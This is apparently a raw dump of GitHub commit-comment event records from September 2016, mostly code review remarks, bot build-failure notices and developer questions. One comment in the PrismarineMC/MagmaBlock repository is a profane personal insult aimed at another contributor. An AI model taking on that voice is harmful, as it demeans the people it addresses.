{"id":"4524993588","type":"CommitCommentEvent","actor":{"login":"MrChen123"},"repo":{"name":"MrChen123/CustomSheet"},"payload":{"comment":{"id":18922018,"position":null,"line":null,"path":null,"commit_id":"833300d6d80dc0cad488ccc8f2f28ee441c6a922","created_at":"2016-09-07T02:01:20Z","updated_at":"2016-09-07T02:01:20Z","body":"![Uploading 01.gif…]()\r\n"}},"created_at":"2016-09-07T02:01:20Z"}
{"id":"4524994721","type":"CommitCommentEvent","actor":{"login":"JLHwung"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":18922021,"position":null,"line":null,"path":null,"commit_id":"3b58fe0254ae650d6428c4b7dc240100468047f9","created_at":"2016-09-07T02:01:44Z","updated_at":"2016-09-07T02:01:44Z","body":"This commit also removes libressl building option."}},"created_at":"2016-09-07T02:01:44Z"}
{"id":"4524994805","type":"CommitCommentEvent","actor":{"login":"Pijoetel"},"repo":{"name":"SWITCHSCIENCE/eVY1_Shield"},"payload":{"comment":{"id":18922022,"position":null,"line":null,"path":null,"commit_id":"ce4a22a84f5fc5aff6d72d8d9b1a137d7a2449e7","created_at":"2016-09-07T02:01:46Z","updated_at":"2016-09-07T02:01:46Z","body":"Hello  Shinichi-Ohki San,\r\nI'm Joseph currently using YAMAHA EVY1 Synthesizer on a project.\r\nI have this sample code above and which is very helpful.\r\nWith this code i want to read and play song (hex data) from external memory directly. \r\nCurrently i can read/play  from external memory but it takes a long time before it start playing from external memory.\r\nAlso song is not synchronize very well. This is due to time delay. \r\nCould you please give some explanation on the delay and how i can solve that..Eg \"void midi play\" and \"timer\" function in the code.\r\n\r\nThanking you in advance and hope to have your reply soon."}},"created_at":"2016-09-07T02:01:46Z"}
{"id":"4524998381","type":"CommitCommentEvent","actor":{"login":"jaeoheeail"},"repo":{"name":"jaeoheeail/addressbook-level2"},"payload":{"comment":{"id":18922028,"position":null,"line":null,"path":null,"commit_id":"b86a5e53662faf5642698fb8604df671320cd46d","created_at":"2016-09-07T02:03:06Z","updated_at":"2016-09-07T02:03:06Z","body":"Add tests for elementsAreUnique method "}},"created_at":"2016-09-07T02:03:06Z"}
{"id":"4525000674","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18922035,"position":null,"line":null,"path":null,"commit_id":"148e29cfaf7f976a5d7fee79c363273d6edce2ff","created_at":"2016-09-07T02:03:58Z","updated_at":"2016-09-07T02:03:58Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-148e29cfaf7f976a5d7fee79c363273d6edce2ff-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-07T02:03:58Z"}
{"id":"4525000674","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18922035,"position":null,"line":null,"path":null,"commit_id":"148e29cfaf7f976a5d7fee79c363273d6edce2ff","created_at":"2016-09-07T02:03:58Z","updated_at":"2016-09-07T02:03:58Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-148e29cfaf7f976a5d7fee79c363273d6edce2ff-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-07T02:03:58Z"}
{"id":"4525002298","type":"CommitCommentEvent","actor":{"login":"MrGenga"},"repo":{"name":"PrismarineMC/MagmaBlock"},"payload":{"comment":{"id":18922037,"position":null,"line":null,"path":null,"commit_id":"f4c6154e6ae78b17ccd1450b950bb3f06668b49d","created_at":"2016-09-07T02:04:34Z","updated_at":"2016-09-07T02:04:34Z","body":"@NcuRO your IQ is smaller than 0, WHAT THE FUCK YOU WAS DOING HERE? YOU JUST COPY PASTE FROM SYNAPSEAPI, IMFIXED IT AND YOU RETURN IT TO FIRST STEP. FUCK YOU STUPID NYCURO"}},"created_at":"2016-09-07T02:04:34Z"}
{"id":"4525009585","type":"CommitCommentEvent","actor":{"login":"MrGenga"},"repo":{"name":"PrismarineMC/MagmaBlock"},"payload":{"comment":{"id":18922050,"position":null,"line":null,"path":null,"commit_id":"f4c6154e6ae78b17ccd1450b950bb3f06668b49d","created_at":"2016-09-07T02:07:18Z","updated_at":"2016-09-07T02:07:18Z","body":"@NycuRO REVERT IT! NOW!"}},"created_at":"2016-09-07T02:07:18Z"}
{"id":"4525010258","type":"CommitCommentEvent","actor":{"login":"jamflux"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18922051,"position":null,"line":null,"path":null,"commit_id":"efa93893a23358c044c434dd7b2a7637c2dc802c","created_at":"2016-09-07T02:07:33Z","updated_at":"2016-09-07T02:07:33Z","body":"@Muchachito, en algunos casos los espacios son necesarios, ejemplo:\r\nXiaomi:  porque va a haber un texto.\r\nTrata en lo posible no corregir estas cosas.\r\nFíjate primero cómo está en el repositorio en inglés antes de hacer algo, así lo que haces es crear posibles bugs de idioma.\r\nAcá los originales en inglés:\r\nhttps://github.com/Acid-miuipolskapl/v8-XML-Compare/tree/master/gemini\r\n"}},"created_at":"2016-09-07T02:07:33Z"}
{"id":"4525010358","type":"CommitCommentEvent","actor":{"login":"MrChen123"},"repo":{"name":"MrChen123/CustomSheet"},"payload":{"comment":{"id":18922052,"position":null,"line":null,"path":null,"commit_id":"833300d6d80dc0cad488ccc8f2f28ee441c6a922","created_at":"2016-09-07T02:07:36Z","updated_at":"2016-09-07T02:07:36Z","body":"![image](https://github.com/MrChen123/CustomSheet/blob/master/01.gif )"}},"created_at":"2016-09-07T02:07:36Z"}
{"id":"4525010704","type":"CommitCommentEvent","actor":{"login":"Labradoodle-360"},"repo":{"name":"SimpleMachines/SMF2.1"},"payload":{"comment":{"id":18922053,"position":null,"line":null,"path":null,"commit_id":"65559629f0e333c93819a0b0b9cea2cb94875ad8","created_at":"2016-09-07T02:07:44Z","updated_at":"2016-09-07T02:07:44Z","body":"Even better than doing this...you could have a method that looped through buttons, tested the display or not display value and then removed any from the array that should not be displayed. That would remove the need for a crazy amount of `if` conditions."}},"created_at":"2016-09-07T02:07:44Z"}
{"id":"4525015344","type":"CommitCommentEvent","actor":{"login":"Labradoodle-360"},"repo":{"name":"SimpleMachines/SMF2.1"},"payload":{"comment":{"id":18922065,"position":null,"line":null,"path":null,"commit_id":"69612e60c7033ae02b5a9ea7f6b6df1a17e44197","created_at":"2016-09-07T02:09:27Z","updated_at":"2016-09-07T02:09:27Z","body":"This might not display properly on Safari (webkit), might want to add some vendor prefixes."}},"created_at":"2016-09-07T02:09:27Z"}
{"id":"4525018267","type":"CommitCommentEvent","actor":{"login":"handrake0724"},"repo":{"name":"Andersbakken/rtags"},"payload":{"comment":{"id":18922068,"position":null,"line":null,"path":null,"commit_id":"b73535cd74c41c9fa131f686f03c181c76f804f2","created_at":"2016-09-07T02:10:34Z","updated_at":"2016-09-07T02:10:34Z","body":"There is a type as follows:\r\n\r\nrtags/src/CompletionThread.cpp:351:51: error: expected ')' before '{' token\r\n                     if (node.completion.isEmpty() {\r\n"}},"created_at":"2016-09-07T02:10:34Z"}
{"id":"4525020502","type":"CommitCommentEvent","actor":{"login":"MrChen123"},"repo":{"name":"MrChen123/CustomSheet"},"payload":{"comment":{"id":18922071,"position":null,"line":null,"path":null,"commit_id":"833300d6d80dc0cad488ccc8f2f28ee441c6a922","created_at":"2016-09-07T02:11:22Z","updated_at":"2016-09-07T02:11:22Z","body":"仿照系统自带的actionSheet，支持单选多选，上下拉刷新\r\n![效果演示](https://github.com/MrChen123/CustomSheet/blob/master/01.gif)"}},"created_at":"2016-09-07T02:11:22Z"}
{"id":"4525025155","type":"CommitCommentEvent","actor":{"login":"ailsoncgt"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":18922078,"position":null,"line":null,"path":null,"commit_id":"c9f59a8c9d0f0383733a97cd6255759ea5932932","created_at":"2016-09-07T02:13:05Z","updated_at":"2016-09-07T02:13:05Z","body":"Foi porque eu dei commit e logo depois o pull. Deu erro no models que não estava identado. Só fiz ajeitar ele , por isso botei o mesmo nome. Esses arquivos a mais é porque continuo botando o add . , mas vou prestar mais atenção."}},"created_at":"2016-09-07T02:13:05Z"}
{"id":"4525026338","type":"CommitCommentEvent","actor":{"login":"MZChangchun"},"repo":{"name":"MZChangchun/MZWkWebView"},"payload":{"comment":{"id":18922080,"position":2,"line":2,"path":"README.md","commit_id":"57aad2b34019ac0fe09bd0584515203b5503e460","created_at":"2016-09-07T02:13:34Z","updated_at":"2016-09-07T02:13:34Z","body":"请自己添加头文件和podfile文件"}},"created_at":"2016-09-07T02:13:34Z"}
{"id":"4525027206","type":"CommitCommentEvent","actor":{"login":"MZChangchun"},"repo":{"name":"MZChangchun/MZWkWebView"},"payload":{"comment":{"id":18922082,"position":null,"line":null,"path":null,"commit_id":"57aad2b34019ac0fe09bd0584515203b5503e460","created_at":"2016-09-07T02:13:56Z","updated_at":"2016-09-07T02:13:56Z","body":"改了read"}},"created_at":"2016-09-07T02:13:56Z"}
{"id":"4525027475","type":"CommitCommentEvent","actor":{"login":"rsanheim"},"repo":{"name":"rsanheim-org/playground"},"payload":{"comment":{"id":18922084,"position":2,"line":2,"path":"README.md","commit_id":"0f829098daa9e6c43c4727af2cc554b1c8680b5c","created_at":"2016-09-07T02:14:03Z","updated_at":"2016-09-07T02:14:03Z","body":"Commit comment on context."}},"created_at":"2016-09-07T02:14:03Z"}
{"id":"4525027645","type":"CommitCommentEvent","actor":{"login":"rsanheim"},"repo":{"name":"rsanheim-org/playground"},"payload":{"comment":{"id":18922085,"position":2,"line":2,"path":"README.md","commit_id":"0f829098daa9e6c43c4727af2cc554b1c8680b5c","created_at":"2016-09-07T02:14:09Z","updated_at":"2016-09-07T02:14:09Z","body":"reply to a commit comment."}},"created_at":"2016-09-07T02:14:09Z"}
{"id":"4525028072","type":"CommitCommentEvent","actor":{"login":"rsanheim"},"repo":{"name":"rsanheim-org/playground"},"payload":{"comment":{"id":18922087,"position":5,"line":5,"path":"README.md","commit_id":"0f829098daa9e6c43c4727af2cc554b1c8680b5c","created_at":"2016-09-07T02:14:16Z","updated_at":"2016-09-07T02:14:16Z","body":"Commit comment on addition."}},"created_at":"2016-09-07T02:14:16Z"}
{"id":"4525028319","type":"CommitCommentEvent","actor":{"login":"rsanheim"},"repo":{"name":"rsanheim-org/playground"},"payload":{"comment":{"id":18922089,"position":5,"line":5,"path":"README.md","commit_id":"0f829098daa9e6c43c4727af2cc554b1c8680b5c","created_at":"2016-09-07T02:14:20Z","updated_at":"2016-09-07T02:14:20Z","body":"a reply."}},"created_at":"2016-09-07T02:14:20Z"}
{"id":"4525028366","type":"CommitCommentEvent","actor":{"login":"rsanheim"},"repo":{"name":"rsanheim-org/playground"},"payload":{"comment":{"id":18922090,"position":8,"line":8,"path":"README.md","commit_id":"0f829098daa9e6c43c4727af2cc554b1c8680b5c","created_at":"2016-09-07T02:14:25Z","updated_at":"2016-09-07T02:14:25Z","body":"more commit comments"}},"created_at":"2016-09-07T02:14:25Z"}
{"id":"4525028767","type":"CommitCommentEvent","actor":{"login":"rsanheim"},"repo":{"name":"rsanheim-org/playground"},"payload":{"comment":{"id":18922092,"position":null,"line":null,"path":null,"commit_id":"0f829098daa9e6c43c4727af2cc554b1c8680b5c","created_at":"2016-09-07T02:14:34Z","updated_at":"2016-09-07T02:14:34Z","body":"a commit comment without path / line / etc.\r\n"}},"created_at":"2016-09-07T02:14:34Z"}
{"id":"4525028935","type":"CommitCommentEvent","actor":{"login":"rsanheim"},"repo":{"name":"rsanheim-org/playground"},"payload":{"comment":{"id":18922094,"position":null,"line":null,"path":null,"commit_id":"0f829098daa9e6c43c4727af2cc554b1c8680b5c","created_at":"2016-09-07T02:14:37Z","updated_at":"2016-09-07T02:14:37Z","body":"#15 "}},"created_at":"2016-09-07T02:14:37Z"}
{"id":"4525029146","type":"CommitCommentEvent","actor":{"login":"Federico-leites"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18922095,"position":null,"line":null,"path":null,"commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T02:14:43Z","updated_at":"2016-09-07T02:14:43Z","body":"Also added Loader class to separate setting parameters from game object class. Game class now handles a list of game objects and runs update/draw on all of them without having to know anything about them."}},"created_at":"2016-09-07T02:14:43Z"}
{"id":"4525035071","type":"CommitCommentEvent","actor":{"login":"scottbentley"},"repo":{"name":"pear/Net_SMTP"},"payload":{"comment":{"id":18922111,"position":null,"line":null,"path":null,"commit_id":"6a949ef7fac178c7b3a95becd6e5717fa2d2391a","created_at":"2016-09-07T02:17:01Z","updated_at":"2016-09-07T02:17:01Z","body":"I don't know why, but the following has been working for me for several months with no negative feedback from users.  Starting line 1031:\r\n\r\n        /* If we have a separate headers string, send it first. */\r\n        if (!is_null($headers)) {\r\n            $this->quotedata($headers);\r\n            $size = strlen($data);//bugfix\r\n            if (PEAR::isError($result = $this->send($headers . \"\\r\\n\\r\\n\"))) {\r\n                return $result;\r\n            }\r\n        }"}},"created_at":"2016-09-07T02:17:01Z"}
{"id":"4525036634","type":"CommitCommentEvent","actor":{"login":"emirpasic"},"repo":{"name":"davidiamyou/go-companion"},"payload":{"comment":{"id":18922116,"position":16,"line":16,"path":"express/express.go","commit_id":"53e696d30d8fef532a16118b19a6593a27fb9406","created_at":"2016-09-07T02:17:41Z","updated_at":"2016-09-07T02:17:41Z","body":"Useful helper, but this gave me an idea of making the constructor New() variadic, so it can accept values, e.g. :+1: \r\n\r\n```go\r\nl := arraylist.New(values)\r\n```\r\n\r\nThis wouldn't even be a breaking change in gods"}},"created_at":"2016-09-07T02:17:41Z"}
{"id":"4525038543","type":"CommitCommentEvent","actor":{"login":"jwandrews"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18922119,"position":null,"line":null,"path":null,"commit_id":"5a2ac56dbe58a656691873ef89c6f8e3692e0bdf","created_at":"2016-09-07T02:18:26Z","updated_at":"2016-09-07T02:18:26Z","body":"@mattdrose Yeah I'll audit the diversity of colour and positioning etc. In the future maybe it's wise that I branch and PR releases and get a code review rather than pushing to master? That was my mistake / oversight. "}},"created_at":"2016-09-07T02:18:26Z"}
{"id":"4525038792","type":"CommitCommentEvent","actor":{"login":"ailsoncgt"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":18922120,"position":null,"line":null,"path":null,"commit_id":"08027c28247101620649e8ca0b7d367e51035176","created_at":"2016-09-07T02:18:31Z","updated_at":"2016-09-07T02:18:31Z","body":"Qual problema da pasta?\r\n\r\nSim, todos tiveram a finalidade de ajudar na issue."}},"created_at":"2016-09-07T02:18:31Z"}
{"id":"4525041177","type":"CommitCommentEvent","actor":{"login":"kato-yutaka"},"repo":{"name":"kato-yutaka/ToDoList"},"payload":{"comment":{"id":18922127,"position":null,"line":null,"path":null,"commit_id":"7294b7ac14261d64de7a9580602a8a1fa5e2c90e","created_at":"2016-09-07T02:19:27Z","updated_at":"2016-09-07T02:19:27Z","body":"https://frozen-fjord-51505.herokuapp.com/tasks/\r\n再提出です"}},"created_at":"2016-09-07T02:19:27Z"}
{"id":"4525042647","type":"CommitCommentEvent","actor":{"login":"kato-yutaka"},"repo":{"name":"kato-yutaka/ToDoList"},"payload":{"comment":{"id":18922129,"position":null,"line":null,"path":null,"commit_id":"7294b7ac14261d64de7a9580602a8a1fa5e2c90e","created_at":"2016-09-07T02:19:58Z","updated_at":"2016-09-07T02:19:58Z","body":"エラーがでてました\r\n"}},"created_at":"2016-09-07T02:19:58Z"}
{"id":"4525045406","type":"CommitCommentEvent","actor":{"login":"double-vane"},"repo":{"name":"wanglimin/dense_flow"},"payload":{"comment":{"id":18922134,"position":null,"line":null,"path":null,"commit_id":"a25f28a5bb14199b5c158ceb4d3a7b737ee0aade","created_at":"2016-09-07T02:21:01Z","updated_at":"2016-09-07T02:21:01Z","body":"@wanglimin Thank you very much"}},"created_at":"2016-09-07T02:21:01Z"}
{"id":"4525046432","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18922138,"position":null,"line":null,"path":null,"commit_id":"68c38686e1160b145b6cb3aa029c4272fd91fed6","created_at":"2016-09-07T02:21:22Z","updated_at":"2016-09-07T02:21:22Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-68c38686e1160b145b6cb3aa029c4272fd91fed6-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-68c38686e1160b145b6cb3aa029c4272fd91fed6-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T02:21:22Z"}
{"id":"4525046581","type":"CommitCommentEvent","actor":{"login":"alternatebow"},"repo":{"name":"CS111C-META-FALL-2016/LabB-Team1"},"payload":{"comment":{"id":18922139,"position":66,"line":60,"path":"src/StackOfBooks.java","commit_id":"16c5eeadeac2542200334c4caf09d78aae193c2e","created_at":"2016-09-07T02:21:25Z","updated_at":"2016-09-07T02:21:25Z","body":"Do want to use pop and push as the alternatives for 'addToStack' and 'removeFromStack'? It is less wordy."}},"created_at":"2016-09-07T02:21:25Z"}
{"id":"4525048868","type":"CommitCommentEvent","actor":{"login":"paulproteus"},"repo":{"name":"ocdtrekkie/draw"},"payload":{"comment":{"id":18922143,"position":597,"line":865,"path":"sandstorm-files.list","commit_id":"c9cca6d2ec8e2f026cf8cfceaf6289b09f03ed0b","created_at":"2016-09-07T02:22:19Z","updated_at":"2016-09-07T02:22:19Z","body":"It looks to me like this Sandstorm app would benefit from adding `node_modules` to `alwaysInclude` see also https://docs.sandstorm.io/en/latest/search.html?q=alwaysInclude"}},"created_at":"2016-09-07T02:22:19Z"}
{"id":"4525049904","type":"CommitCommentEvent","actor":{"login":"Andersbakken"},"repo":{"name":"Andersbakken/rtags"},"payload":{"comment":{"id":18922148,"position":null,"line":null,"path":null,"commit_id":"b73535cd74c41c9fa131f686f03c181c76f804f2","created_at":"2016-09-07T02:22:45Z","updated_at":"2016-09-07T02:22:45Z","body":"Oops. My bad. Should be fixed now.\n\nAnders\n\nOn Tue, Sep 6, 2016 at 7:10 PM, handrake0724 <notifications@github.com>\nwrote:\n\n> There is a type as follows:\n>\n> rtags/src/CompletionThread.cpp:351:51: error: expected ')' before '{'\n> token\n> if (node.completion.isEmpty() {\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Andersbakken/rtags/commit/b73535cd74c41c9fa131f686f03c181c76f804f2#commitcomment-18922068>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAEdSsA6GtSh0UPxxKVlkVfI86voeWgmks5qnh0agaJpZM4J2dy7>\n> .\n>\n"}},"created_at":"2016-09-07T02:22:45Z"}
{"id":"4525050806","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18922150,"position":null,"line":null,"path":null,"commit_id":"68c38686e1160b145b6cb3aa029c4272fd91fed6","created_at":"2016-09-07T02:23:07Z","updated_at":"2016-09-07T02:23:07Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-68c38686e1160b145b6cb3aa029c4272fd91fed6-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-68c38686e1160b145b6cb3aa029c4272fd91fed6-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T02:23:07Z"}
{"id":"4525051123","type":"CommitCommentEvent","actor":{"login":"mattdrose"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18922151,"position":null,"line":null,"path":null,"commit_id":"5a2ac56dbe58a656691873ef89c6f8e3692e0bdf","created_at":"2016-09-07T02:23:13Z","updated_at":"2016-09-07T02:23:13Z","body":"You _could_, but sometimes you need the changes asap. Not worth waiting for a review in those cases :P. If I worked at CP, I'd say that's the way to do it. I'm just being nosey and asking questions :D."}},"created_at":"2016-09-07T02:23:13Z"}
{"id":"4525051715","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922152,"position":13,"line":12,"path":"IStudentLister.java","commit_id":"56de0dc87af1a73ec69956932a42a1a67b278542","created_at":"2016-09-07T02:23:25Z","updated_at":"2016-09-07T02:23:25Z","body":"Well written comment. Defines what the program does."}},"created_at":"2016-09-07T02:23:25Z"}
{"id":"4525054353","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922158,"position":15,"line":13,"path":"IStudentUnitRecord.java","commit_id":"56de0dc87af1a73ec69956932a42a1a67b278542","created_at":"2016-09-07T02:24:21Z","updated_at":"2016-09-07T02:24:21Z","body":"Indentation must be fixed."}},"created_at":"2016-09-07T02:24:21Z"}
{"id":"4525054514","type":"CommitCommentEvent","actor":{"login":"ocdtrekkie"},"repo":{"name":"ocdtrekkie/draw"},"payload":{"comment":{"id":18922160,"position":597,"line":865,"path":"sandstorm-files.list","commit_id":"c9cca6d2ec8e2f026cf8cfceaf6289b09f03ed0b","created_at":"2016-09-07T02:24:25Z","updated_at":"2016-09-07T02:24:25Z","body":"That's not a terrible idea, @paulproteus. Are things in alwaysInclude dropped from sandstorm-files.list?"}},"created_at":"2016-09-07T02:24:25Z"}
{"id":"4525055322","type":"CommitCommentEvent","actor":{"login":"grahambell"},"repo":{"name":"eaobservatory/jsa_proc"},"payload":{"comment":{"id":18922162,"position":38,"line":58,"path":"lib/jsa_proc/jac/file.py","commit_id":"775fc25def73a2b17238e81f2aba726f9192cb38","created_at":"2016-09-07T02:24:42Z","updated_at":"2016-09-07T02:24:42Z","body":"I don't think this will be understood as a tuple."}},"created_at":"2016-09-07T02:24:42Z"}
{"id":"4525057159","type":"CommitCommentEvent","actor":{"login":"nigef"},"repo":{"name":"pyta-uoft/pyta"},"payload":{"comment":{"id":18922167,"position":27,"line":27,"path":"sample_usage/print_nodes.py","commit_id":"4af54241d63867e82eb866b66fc35bf474eee581","created_at":"2016-09-07T02:25:24Z","updated_at":"2016-09-07T02:25:24Z","body":"black on black is a bit hard to see, maybe we could use `Fore.WHITE` for more contrast."}},"created_at":"2016-09-07T02:25:24Z"}
{"id":"4525057705","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922171,"position":9,"line":3,"path":"ListStudentsCTL.java","commit_id":"56de0dc87af1a73ec69956932a42a1a67b278542","created_at":"2016-09-07T02:25:34Z","updated_at":"2016-09-07T02:25:34Z","body":"Indentation should be fixed."}},"created_at":"2016-09-07T02:25:34Z"}
{"id":"4525058013","type":"CommitCommentEvent","actor":{"login":"RadianFord"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18922173,"position":null,"line":null,"path":null,"commit_id":"23b271c9582c5c5e1ab60b8a356facd69e90f905","created_at":"2016-09-07T02:25:40Z","updated_at":"2016-09-07T02:25:40Z","body":"There's a message saying ```Nothing found in the selected map.``` where can i find that message?"}},"created_at":"2016-09-07T02:25:40Z"}
{"id":"4525058561","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922175,"position":8,"line":2,"path":"ListStudentsCTL.java","commit_id":"56de0dc87af1a73ec69956932a42a1a67b278542","created_at":"2016-09-07T02:25:52Z","updated_at":"2016-09-07T02:25:52Z","body":"Indentation should be fixed."}},"created_at":"2016-09-07T02:25:52Z"}
{"id":"4525060025","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922178,"position":11,"line":4,"path":"ListUnitsCTL.java","commit_id":"56de0dc87af1a73ec69956932a42a1a67b278542","created_at":"2016-09-07T02:26:26Z","updated_at":"2016-09-07T02:26:26Z","body":"Line Break should be added here."}},"created_at":"2016-09-07T02:26:26Z"}
{"id":"4525060461","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18922179,"position":null,"line":null,"path":null,"commit_id":"be097d309a5b291c1767f3080bb4621d8c61e7cb","created_at":"2016-09-07T02:26:36Z","updated_at":"2016-09-07T02:26:36Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;CtagJkF7&#x2F;6-ft-005a-hello-world-server\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [FT-005a] Hello world &#x2F; server</a>"}},"created_at":"2016-09-07T02:26:36Z"}
{"id":"4525060953","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18922181,"position":null,"line":null,"path":null,"commit_id":"68c38686e1160b145b6cb3aa029c4272fd91fed6","created_at":"2016-09-07T02:26:48Z","updated_at":"2016-09-07T02:26:48Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-68c38686e1160b145b6cb3aa029c4272fd91fed6-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-07T02:26:48Z"}
{"id":"4525062944","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922182,"position":11,"line":11,"path":"Main.java","commit_id":"56de0dc87af1a73ec69956932a42a1a67b278542","created_at":"2016-09-07T02:27:35Z","updated_at":"2016-09-07T02:27:35Z","body":"The code should be fixed. The code inside the {} should be below the method to make it ethical."}},"created_at":"2016-09-07T02:27:35Z"}
{"id":"4525063528","type":"CommitCommentEvent","actor":{"login":"nigef"},"repo":{"name":"pyta-uoft/pyta"},"payload":{"comment":{"id":18922184,"position":53,"line":53,"path":"sample_usage/print_nodes.py","commit_id":"4af54241d63867e82eb866b66fc35bf474eee581","created_at":"2016-09-07T02:27:48Z","updated_at":"2016-09-07T02:27:48Z","body":"(only) The path without dots 'nodes/' works on a Mac, lets make this change if it works on Windows too."}},"created_at":"2016-09-07T02:27:48Z"}
{"id":"4525068152","type":"CommitCommentEvent","actor":{"login":"Dreameeer"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922194,"position":24,"line":9,"path":"Student.java","commit_id":"b107355484d4bd79e25f274880e4e1b49290ba9a","created_at":"2016-09-07T02:29:40Z","updated_at":"2016-09-07T02:29:40Z","body":"indentation needs to be done"}},"created_at":"2016-09-07T02:29:40Z"}
{"id":"4525068199","type":"CommitCommentEvent","actor":{"login":"Ozymandias81"},"repo":{"name":"Realm667/WolfenDoom"},"payload":{"comment":{"id":18922195,"position":null,"line":null,"path":null,"commit_id":"a7be9b0b1312dcf09f0399f29d9ec1ce96051845","created_at":"2016-09-07T02:29:41Z","updated_at":"2016-09-07T02:29:41Z","body":"Uhm... Nope, I think you must work with CheckRange tweaks because the CountProximity is called 1tic in a looped state, so I get the same amount of lags :sob: \r\n![screenshot_doom_20160907_042321](https://cloud.githubusercontent.com/assets/11136108/18297728/3445373a-74b3-11e6-8044-0dc722eacc32.png)\r\n...so the dummy state is needed imho, this way you may also keep the gldefs as it was before because you'll get back with the 25 thing.\r\n\r\nBTW have you set on your config cl_capfps to true? Maybe you don't get framerate changes even for this reason too."}},"created_at":"2016-09-07T02:29:41Z"}
{"id":"4525070655","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18922197,"position":null,"line":null,"path":null,"commit_id":"56de0dc87af1a73ec69956932a42a1a67b278542","created_at":"2016-09-07T02:30:30Z","updated_at":"2016-09-07T02:30:30Z","body":"Comments were added according to what the code does. \r\nIndentation is not done in some cases, which needs to be redone.\r\n"}},"created_at":"2016-09-07T02:30:30Z"}
{"id":"4525071542","type":"CommitCommentEvent","actor":{"login":"F1nZeR"},"repo":{"name":"Squesh/Deloris-server"},"payload":{"comment":{"id":18922199,"position":7,"line":7,"path":"core/src/main/scala/org/deloris/core/item/wearable/weapon/Weapon.scala","commit_id":"8d6d2470a477183e8d5e4d47e96db08bd62ffa48","created_at":"2016-09-07T02:30:49Z","updated_at":"2016-09-07T02:30:49Z","body":"Mby CompositeDamage can be inherited from Damage later (see pattern Composer)"}},"created_at":"2016-09-07T02:30:49Z"}
